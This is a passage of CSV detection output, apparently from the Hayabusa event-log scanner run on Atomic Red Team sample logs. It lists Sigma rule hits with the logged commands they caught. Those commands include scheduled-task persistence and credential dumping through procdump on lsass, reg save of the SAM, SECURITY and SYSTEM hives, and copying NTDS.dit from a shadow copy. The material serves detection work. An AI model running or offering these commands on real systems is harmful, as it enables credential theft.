""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT 
Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell 
Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam 
sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump 
Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c 
""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM 